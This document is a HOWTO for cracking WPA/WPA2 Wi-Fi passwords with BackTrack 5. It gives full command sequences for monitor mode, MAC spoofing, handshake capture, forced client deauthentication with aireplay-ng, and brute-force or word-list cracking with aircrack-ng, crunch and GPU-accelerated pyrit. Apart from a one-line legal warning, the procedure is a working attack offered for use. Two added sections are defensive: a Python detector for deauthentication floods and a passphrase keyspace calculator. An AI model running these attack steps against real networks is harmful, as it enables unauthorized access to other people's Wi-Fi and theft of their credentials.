HOWTO : WPA/WPA2 cracking with Back|Track 5

Don't crack any Wi-Fi router without authorization; otherwise, you will be put in jail.

(A) General display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then press Ctrl+C to stop the scan; note the channel and BSSID of the target network, which the next step needs.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
       -w is the prefix of the capture file to be written
       --bssid is the BSSID of the target access point

Leave this terminal running.

Step 6 :

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
       -c is the client MAC address (STATION)

Wait for the handshake to be captured.

Step 7 :

Use John the Ripper's word list to crack the WPA/WPA2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper's word list, you can generate candidates with Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the password length range, i.e. from 8 to 16 characters.
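
Steps 6 and f depend on a burst of deauthentication frames to force the client to reconnect, and on the defending side that burst is exactly what a wireless IDS alerts on. The following is an added example, not part of the original HOWTO: a small Python detector over raw 802.11 management frames (24-byte MAC header plus the 2-byte reason code, no radiotap header assumed) that alerts when deauth or disassoc frames for one BSSID reach a threshold inside a sliding window. The addresses 02:00:00:00:00:aa and 02:00:00:00:00:bb and the sample capture are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 8, 10, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP, CLIENT = "02:00:00:00:00:aa", "02:00:00:00:00:bb"   # constructed placeholder addresses

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame):
    """Return (subtype, dst, src, bssid, reason) for an 802.11 management frame, else None."""
    if len(frame) < 24 or ((frame[0] >> 2) & 0x3) != 0:   # type field must be 0 (management)
        return None
    subtype = frame[0] >> 4
    dst, src, bssid = (mac_str(frame[i:i + 6]) for i in (4, 10, 16))
    reason = None
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]   # little-endian reason code
    return subtype, dst, src, bssid, reason

def detect_deauth_flood(frames, window_s=1.0, threshold=3):
    """frames: iterable of (timestamp_s, raw_frame). Emit one alert per BSSID whose
    deauth/disassoc count reaches `threshold` inside any `window_s` sliding window."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        p = parse_mgmt(raw)
        if p is None or p[0] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue   # beacons, probes, data frames etc. are not counted
        _, dst, _, bssid, reason = p
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window_s:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(q), "at": ts,
                           "broadcast": dst == BROADCAST, "reason": reason})
    return alerts

def build_mgmt(subtype, dst, src, bssid, body=b""):
    """Constructed test fixture: frame control, duration, addr1-3, sequence control, body."""
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid))
    return bytes([subtype << 4, 0]) + b"\x00\x00" + addrs + b"\x00\x00" + body

def sample_capture():
    """Constructed capture: a beacon every 100 ms, plus a burst of 4 deauths from t=0.50 s."""
    frames = [(0.1 * i, build_mgmt(SUBTYPE_BEACON, BROADCAST, AP, AP)) for i in range(10)]
    deauth = build_mgmt(SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))
    return frames + [(0.50 + 0.01 * i, deauth) for i in range(4)]
```

Running detect_deauth_flood(sample_capture()) yields a single alert for the constructed AP with count 3 and reason code 7; the beacons alone produce none.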

(B) nVidia display card with CUDA

If you have an nVidia card with CUDA support, you can use pyrit together with crunch to crack the password.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then press Ctrl+C to stop the scan; note the channel and BSSID of the target network, which the next step needs.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

*where the options are as in Step 5; --ivs is omitted so that the full capture is written to wpacrack-01.cap, which pyrit reads in Step j.

Step f :

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
       -c is the client MAC address (STATION)

Wait for the handshake to be captured.

Step g :

If the following packages are not yet installed, install them:

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
cd ..

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the password length range, i.e. from 8 to 16 characters.

Step k (Optional) :

If you encounter an error when reading wpacrack-01.cap, strip the capture first and attack the stripped file instead.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the password length range, i.e. from 8 to 16 characters.

Step l :

Then you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the cracking speed is about 17,000 passwords per second.
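
Steps 8 and j hand crunch's 8 to 16 character space to the cracker, and the Remarks quote about 17,000 PMKs per second. The following is an added example, not from the HOWTO, that turns those two figures into worst-case exhaustion times for several passphrase policies; it assumes 95 printable ASCII characters for the charset (the Swedish charset the HOWTO uses is larger, so these figures are lower bounds) and the 17504 PMK/s figure from the pyrit output above.

```python
YEAR_S = 365.25 * 24 * 3600
PAGE_RATE_PMK_PER_S = 17504   # "17504 PMKs per second" from the pyrit output in Step l

def keyspace(charset_size, min_len, max_len):
    """Number of candidates crunch emits for all lengths min_len..max_len (inclusive)."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def seconds_to_exhaust(candidates, rate_per_s):
    """Worst case: every candidate is tested; on average only half of them are needed."""
    return candidates / rate_per_s

def humanize(seconds):
    for unit, size in (("years", YEAR_S), ("days", 86400.0), ("hours", 3600.0), ("minutes", 60.0)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"

# (label, charset size, min length, max length); the 95-character alphabet is an assumption.
POLICIES = [
    ("8 lowercase letters", 26, 8, 8),
    ("8 mixed-case letters and digits", 62, 8, 8),
    ("8 printable ASCII (assumed 95)", 95, 8, 8),
    ("crunch 8 16 over printable ASCII (assumed 95)", 95, 8, 16),
    ("5 random words from a 7776-word list", 7776, 5, 5),
]

def report(rate_per_s=PAGE_RATE_PMK_PER_S):
    """Return [(label, candidates, worst-case time string)] for each policy at rate_per_s."""
    rows = []
    for label, charset_size, lo, hi in POLICIES:
        n = keyspace(charset_size, lo, hi)
        rows.append((label, n, humanize(seconds_to_exhaust(n, rate_per_s))))
    return rows

if __name__ == "__main__":
    for label, n, t in report():
        print(f"{label:48s} {n:>32,d} candidates  {t}")
```

Only the 8-lowercase row finishes within a year at this rate; the others run to centuries or far longer, so the practical exposure is a passphrase that appears in a word list such as the one Step 7 uses, not one that crunch has to enumerate.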

To test whether your wireless card (USB or PCI-e) supports packet injection:

airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit works on your system :

pyrit list_cores

That's all! See you.